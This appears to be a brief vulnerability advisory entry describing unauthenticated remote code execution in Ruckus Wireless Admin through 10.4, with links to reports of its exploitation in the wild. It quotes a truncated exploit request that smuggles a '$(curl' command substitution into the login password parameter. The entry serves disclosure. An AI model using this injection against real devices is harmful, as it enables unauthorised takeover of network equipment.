Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.
https://thehackernews.com/2024/06/chinese-actor-secshow-conducts-massive.html
https://blog.xlab.qianxin.com/catddos-derivative-en/